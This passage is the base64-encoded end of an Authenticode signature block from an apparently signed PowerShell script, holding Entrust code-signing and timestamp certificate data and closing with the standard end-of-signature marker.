ZrGypOr8xZWjjRKl9Y3vGyDNmffnMvNZcR/dlOZ55VIjEFYq/Fk4v795JZJqx/2r # Z3dxsQR9Na0UwT6o/CMXVggYfNd6ImuRasw1RW1PO51DnQW4nfP8NCFcBBgyVzg0 # wcqDI0amiCMhxn4UgKux77sLrAk/7lORMbPiVESqtX0wPCwjnOg/o1jqQAgXoyBf # esAM26r/AxYDDXRkIpqUXjA1dhP10+Hj4AfK2epFiEacVNUQ4vMyCUC251wXMv7M # r+ttz2A8dfPuXGBAVRu1Wa9yI2hNnHQEDBDJr1Bbpw1mD5blmpXgIKIa0LDuOEme # KmeekZZsmNvEEG1gfB5uSOe2fq8zBxJx772VO76pg9RCfbenNNdfhpG1r1ZY2lV9 # F73bvM1kQRWNMVEGT7Qusos9nPNN41gDVMysiPhSPE5LRgklGf8V56eYRi59uurj # 43z/+bkZlb52uQ15sgJRGkrIn4jCQzGCF7wwghe4AgEBMGMwTzELMAkGA1UEBhMC # VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAMTH0VudHJ1c3QgQ29k # ZSBTaWduaW5nIENBIC0gT1ZDUzICECnIzuCvIOH2BRaYqhgelIgwDQYJYIZIAWUD # BAIBBQCgfDAQBgorBgEEAYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGC # NwIBBDAcBgorBgEEAYI3AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQx # IgQg1MLytTPnxL1IYc1LEuppZm5XQKNx+E8KYiY7JTboS3owDQYJKoZIhvcNAQEB # BQAEggGATn4OII+wiKZUww5HXVLVb0HSH8CzCxAL0+Jt/ofmf1ByctqGMSZIbtSE # I6u8J60f1pA/NgoIBUC5R8I6BV6NmwAJf5zCbLPMuOY7zMErp8lONx40/i+6QTgs # Jif/P0cw7KWIs2O/DyTxfo/yh/W62SnXPkEgmR3BZYVQnYXJc3cHxWGz4HIHNQSx # xsfJtjprYNdYopjxmsjtNncdQLWFMlmSlCXCc4C5xoHcE/0AaiFjEPPCyvD9JxMB # m0ZvpjxdmqObg67dlda4RcZggHq3c7SzxvF5sj6zEtEtkTVifnpUQbtxU1s8LIua # GYWOT7YyY+6m5lcAdxz3BMFjc1qJsyhaXAIxUk3SIcuonKmioGauouBFzGo1uqrC # lSwqGlPbUCZzntPSYsbAp1Wu8SQe8hprV5rdAXjNgVVr+k1GpzPqG2CzrjoCkaH7 # pCCfkb9rXISv1lTuShKWD0a5Xttpg8K6vgGRVDF0/1uw9+eoiYF/gHWp1OUkUJla # u9TfMsTCoYIVLDCCFSgGCisGAQQBgjcDAwExghUYMIIVFAYJKoZIhvcNAQcCoIIV # BTCCFQECAQMxDTALBglghkgBZQMEAgEwgfQGCyqGSIb3DQEJEAEEoIHkBIHhMIHe # AgEBBgpghkgBhvpsCgMFMDEwDQYJYIZIAWUDBAIBBQAEIGoMW+ljMi6qfOXNGu6h # IODNg2HnI8l/SL9PbzghHS2PAgkAzUYb7TqvW/oYDzIwMjQwNDE5MTExODM3WjAD # AgEBoHmkdzB1MQswCQYDVQQGEwJDQTEQMA4GA1UECBMHT250YXJpbzEPMA0GA1UE # BxMGT3R0YXdhMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSswKQYDVQQDEyJFbnRy # dXN0IFRpbWVzdGFtcCBBdXRob3JpdHkgLSBUU0ExoIIPWDCCBCowggMSoAMCAQIC # BDhj3vgwDQYJKoZIhvcNAQEFBQAwgbQxFDASBgNVBAoTC0VudHJ1c3QubmV0MUAw # PgYDVQQLFDd3d3cuZW50cnVzdC5uZXQvQ1BTXzIwNDggaW5jb3JwLiBieSByZWYu # IChsaW1pdHMgbGlhYi4pMSUwIwYDVQQLExwoYykgMTk5OSBFbnRydXN0Lm5ldCBM # aW1pdGVkMTMwMQYDVQQDEypFbnRydXN0Lm5ldCBDZXJ0aWZpY2F0aW9uIEF1dGhv # cml0eSAoMjA0OCkwHhcNOTkxMjI0MTc1MDUxWhcNMjkwNzI0MTQxNTEyWjCBtDEU # MBIGA1UEChMLRW50cnVzdC5uZXQxQDA+BgNVBAsUN3d3dy5lbnRydXN0Lm5ldC9D # UFNfMjA0OCBpbmNvcnAuIGJ5IHJlZi4gKGxpbWl0cyBsaWFiLikxJTAjBgNVBAsT # HChjKSAxOTk5IEVudHJ1c3QubmV0IExpbWl0ZWQxMzAxBgNVBAMTKkVudHJ1c3Qu # bmV0IENlcnRpZmljYXRpb24gQXV0aG9yaXR5ICgyMDQ4KTCCASIwDQYJKoZIhvcN # AQEBBQADggEPADCCAQoCggEBAK1NS6kShrLqoyAHFRZkKitL0b8LSk2O7YB2pWe3 # eEDAc0LIaMDbUyvdXrh2mDWTixqdfBM6Dh9btx7P5SQUHrGBqY19uMxrSwPxAgzc # q6VAJAB/dJShnQgps4gL9Yd3nVXN5MN+12pkq4UUhpVblzJQbz3IumYM4/y9uEnB # dolJGf3AqL2Jo2cvxp+8cRlguC3pLMmQdmZ7lOKveNZlU1081pyyzykD+S+kULLU # SM4FMlWK/bJkTA7kmAd123/fuQhVYIUwKfl7SKRphuM1Px6GXXp6Fb3vAI4VIlQX # AJAmk7wOSWiRv/hH052VQsEOTd9vJs/DGCFiZkNw1tXAB+ECAwEAAaNCMEAwDgYD # VR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFFXkgdERgL7Y # ibkIozH5oSQJFrlwMA0GCSqGSIb3DQEBBQUAA4IBAQA7m49WmzDnU5l8enmnTZfX # GZWQ+wYfyjN8RmOPlmYk+kAbISfK5nJz8k/+MZn9yAxMaFPGgIITmPq2rdpdPfHO # bvYVEZSCDO4/la8Rqw/XL94fA49XLB7Ju5oaRJXrGE+mH819VxAvmwQJWoS1btgd # OuHWntFseV55HBTF49BMkztlPO3fPb6m5ZUaw7UZw71eW7v/I+9oGcsSkydcAy1v # MNAethqs3lr30aqoJ6b+eYHEeZkzV7oSsKngQmyTylbe/m2ECwiLfo3q15ghxvPn # PHkvXpzRTBWN4ewiN8yaQwuX3ICQjbNnm29ICBVWz7/xK3xemnbpWZDFfIM1EWVR # MIIFEzCCA/ugAwIBAgIMWNoT/wAAAABRzg33MA0GCSqGSIb3DQEBCwUAMIG0MRQw # EgYDVQQKEwtFbnRydXN0Lm5ldDFAMD4GA1UECxQ3d3d3LmVudHJ1c3QubmV0L0NQ # U18yMDQ4IGluY29ycC4gYnkgcmVmLiAobGltaXRzIGxpYWIuKTElMCMGA1UECxMc # KGMpIDE5OTkgRW50cnVzdC5uZXQgTGltaXRlZDEzMDEGA1UEAxMqRW50cnVzdC5u # ZXQgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgKDIwNDgpMB4XDTE1MDcyMjE5MDI1 # NFoXDTI5MDYyMjE5MzI1NFowgbIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRy # dXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1c3QubmV0L2xlZ2FsLXRl # cm1zMTkwNwYDVQQLEzAoYykgMjAxNSBFbnRydXN0LCBJbmMuIC0gZm9yIGF1dGhv # cml6ZWQgdXNlIG9ubHkxJjAkBgNVBAMTHUVudHJ1c3QgVGltZXN0YW1waW5nIENB # IC0gVFMxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2SPmFKTofEuF # cVj7+IHmcotdRsOIAB840Irh1m5WMOWv2mRQfcITOfu9ZrTahPuD0Cgfy3boYFBp # m/POTxPiwT7B3xLLMqP4XkQiDsw66Y1JuWB0yN5UPUFeQ18oRqmmt8oQKyK8W01b # jBdlEob9LHfVxaCMysKD4EdXfOdwrmJFJzEYCtTApBhVUvdgxgRLs91oMm4QHzQR # uBJ4ZPHuqeD347EijzRaZcuK9OFFUHTfk5emNObQTDufN0lSp1NOny5nXO2W/KW/ # dFGI46qOvdmxL19QMBb0UWAia5nL/+FUO7n7RDilCDkjm2lH+jzE0Oeq30ay7PKK # GawpsjiVdQIDAQABo4IBIzCCAR8wEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNVHQ8B # Af8EBAMCAQYwOwYDVR0gBDQwMjAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6 # Ly93d3cuZW50cnVzdC5uZXQvcnBhMDMGCCsGAQUFBwEBBCcwJTAjBggrBgEFBQcw # AYYXaHR0cDovL29jc3AuZW50cnVzdC5uZXQwMgYDVR0fBCswKTAnoCWgI4YhaHR0 # cDovL2NybC5lbnRydXN0Lm5ldC8yMDQ4Y2EuY3JsMBMGA1UdJQQMMAoGCCsGAQUF # BwMIMB0GA1UdDgQWBBTDwnHSe9doBa47OZs0JQxiA8dXaDAfBgNVHSMEGDAWgBRV # 5IHREYC+2Im5CKMx+aEkCRa5cDANBgkqhkiG9w0BAQsFAAOCAQEAHSTnmnRbqnD8 # sQ4xRdcsAH9mOiugmjSqrGNtifmf3w13/SQj/E+ct2+P8/QftsH91hzEjIhmwWON # uld307gaHshRrcxgNhqHaijqEWXezDwsjHS36FBD08wo6BVsESqfFJUpyQVXtWc2 # 6Dypg+9BwSEW0373LRFHZnZgghJpjHZVcw/fL0td6Wwj+Af2tX3WaUWcWH1hLvx4 # S0NOiZFGRCygU6hFofYWWLuRE/JLxd8LwOeuKXq9RbPncDDnNI7revbTtdHeaxOZ # RrOL0k2TdbXxb7/cACjCJb+856NlNOw/DR2XjPqqiCKkGDXbBY524xDIKY9j0K6s # GNnaxJ9REjCCBg8wggT3oAMCAQICEAfXE1PaJWG0YemQR4pMzgQwDQYJKoZIhvcN # AQELBQAwgbIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgw # JgYDVQQLEx9TZWUgd3d3LmVudHJ1c3QubmV0L2xlZ2FsLXRlcm1zMTkwNwYDVQQL # EzAoYykgMjAxNSBFbnRydXN0LCBJbmMuIC0gZm9yIGF1dGhvcml6ZWQgdXNlIG9u # bHkxJjAkBgNVBAMTHUVudHJ1c3QgVGltZXN0YW1waW5nIENBIC0gVFMxMB4XDTI0 # MDExOTE2NDYyOFoXDTI5MDYwMTAwMDAwMFowdTELMAkGA1UEBhMCQ0ExEDAOBgNV # BAgTB09udGFyaW8xDzANBgNVBAcTBk90dGF3YTEWMBQGA1UEChMNRW50cnVzdCwg # SW5jLjErMCkGA1UEAxMiRW50cnVzdCBUaW1lc3RhbXAgQXV0aG9yaXR5IC0gVFNB # MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMeSOEE5/6A/X01Nipcx # 45uHw3gFaTYLUrOqg12w0r1+voOgX16el/PbNRep+dsVYnzK9sXJNBXiEaWSsS7g # aVRdDiu+VcYBjIVjskktNV/lTkPEcQuktB40Tf9FyP5P4TDo6WVsa2XTvtQsaNCt # BJtqudBU+zUAkDHG2GhqXa/qftD5nRPvzp1jZEJyB4X7BjGL450LptUy21KlTgw8 # wcCa0X8Cd2MTzfM9PB4CSzaG4AS0eHfkmy/hiSregl3r5Brcjbp7pJ+Pjmx16wPg # gAS/sQkc+mF6s5uBtwvJEwp47Qj2zKZfQkcSOkd4dv682pk/ZOs3XirfUuKZsP3v # hMqROqKwp7G2Vhw/RPh+ke94piT+3ike+PX3UX+2eC2HtL0AucYe4OjhE+7uX9de # 7qR8dWDOoTWQWMKrtUhDe+nHd4mJi8ahjGmXz256Q/70X/tj5STq3+AQkKcSkMwb # rQiK0Y2FIKJuoYsWJ5Ux089uAymfRMInCKy39IlNN+QliVpTLFMNghRzxuzFsNmH # 2JsS7iY6X5cvcMkweKFaSm3SSEoPVWp+9lvih1/aERt3vhpe90gKmHEMfa4qgX2y # npFgDtHZajASiuSa7KZLb4UGSRAOhUg/LuYUz1rjTzgqr9cxALwslpWSrXPPehxR # y/4t6cAuWA4KFWXLiHsyG2ANAgMBAAGjggFbMIIBVzAMBgNVHRMBAf8EAjAAMB0G # A1UdDgQWBBRDaB9vnyLQ+F8J9/y45SPGjgdCkjAfBgNVHSMEGDAWgBTDwnHSe9do # Ba47OZs0JQxiA8dXaDBoBggrBgEFBQcBAQRcMFowIwYIKwYBBQUHMAGGF2h0dHA6 # Ly9vY3NwLmVudHJ1c3QubmV0MDMGCCsGAQUFBzAChidodHRwOi8vYWlhLmVudHJ1 # c3QubmV0L3RzMS1jaGFpbjI1Ni5jZXIwMQYDVR0fBCowKDAmoCSgIoYgaHR0cDov # L2NybC5lbnRydXN0Lm5ldC90czFjYS5jcmwwDgYDVR0PAQH/BAQDAgeAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMEIGA1UdIAQ7MDkwNwYKYIZIAYb6bAoBBzApMCcG # CCsGAQUFBwIBFhtodHRwczovL3d3dy5lbnRydXN0Lm5ldC9ycGEwDQYJKoZIhvcN # AQELBQADggEBAL6w3P28+man/CMd89lXYvQk3x0v+VjLyswMfc9uh/Vuglor3uNf # xs4a5AivjgQBHv8C+AVTuKhihXuZq0V72aqxF4PRKX6TIeg2iEIhOPv7DYHJw4qM # yipeZq/5nPSNfBL7em06irAA9ztwpQ+7tVOp4cYpJurcEkovXVoEuKrjhwt9yJ4G # /mlmS46n9L4wyaXikKGogQ0+RyGSUF0y5PJWz6mUIbswwncYEZomrvHiPi/8P4kz # N12U590axeXMZmz6AM6W4oDt+CynxWgTaXwERK0I1fmrya0XZtUvC1fwm89cHqsN # J0Zp/qi3BSWO4LIVM0pfupyL0CgJPLWFsuExggSYMIIElAIBATCBxzCBsjELMAkG # A1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3 # d3cuZW50cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDE1IEVu # dHJ1c3QsIEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEmMCQGA1UEAxMd # RW50cnVzdCBUaW1lc3RhbXBpbmcgQ0EgLSBUUzECEAfXE1PaJWG0YemQR4pMzgQw # CwYJYIZIAWUDBAIBoIIBpTAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJ # KoZIhvcNAQkFMQ8XDTI0MDQxOTExMTgzN1owKQYJKoZIhvcNAQk0MRwwGjALBglg # hkgBZQMEAgGhCwYJKoZIhvcNAQELMC8GCSqGSIb3DQEJBDEiBCBrUi9uZmWoUhIv # ukHCWJY4EQ76fgsy5janbU0PBTcACDCCAQsGCyqGSIb3DQEJEAIvMYH7MIH4MIH1 # MIHyBCAoSfcxGNdBRQVhc80+7Mu9U0teDvD6BhaNsOJzSQPujzCBzTCBuKSBtTCB # sjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsT # H1NlZSB3d3cuZW50cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAy # MDE1IEVudHJ1c3QsIEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEmMCQG # A1UEAxMdRW50cnVzdCBUaW1lc3RhbXBpbmcgQ0EgLSBUUzECEAfXE1PaJWG0YemQ # R4pMzgQwCwYJKoZIhvcNAQELBIICAJGvMETBXV6sFDVMvsyAdXWS7Vrttc49ZBnI # tHXTFRQnvyZKW5XLsuXpubv5nehXuCi21XLmhY5VsbG+v99M6iWTDdlVqMT28Jvb # CiBKICwfwrgGjHQ3WlT7eenglQiToGlWjjRRd1pk1/X6a0kEm3raTNSgNjuPEMnt # AeB63d4iGVRpKfxyeP1C5TxmO7s98EH8SX4bT3di6diZQYTUpXk183s+crIL6Sgx # /OELs5MTJXDHtGlJnqTQYxwRUhCr7V8ZP9THH9XmUZTUg4b5qwngItlfAAKlInDp # GzRbE6lyfVKa1gulm3SH6qr1roU4liIn0sGtZClyEGmbRogImjpalq8InqFnG/4j # mSLKrDBwm3zyKh/GGbNKBU7bXgw/5oZriOF/r5N0Z8TCDtSSUN+9ssQyzhM/TgYW # Z0GiszffbxRg9i1LOzP9c5lvm3mYnYXq99hyV254dOoaBUN568s6oeE02lFkfBDn # zt3QpnCEYFxFbyeXbeAg3ECV0hONBYl8JRtgljb7weWFUc7zY4RFOQBxWhOMt0xA # uBJ6ChWLtpO2thC7jBMA0gLgkGnW0TLdGGOEjfkeSUyPhKVsZF6Wb/E9sliMxsId # K28UvU9hKBafc9Xm5qD3PIImHC/qufytCsgRcZTVYveUzJtqsTHGyMjGeudeDGPF # Wad11Z7h # SIG # End signature block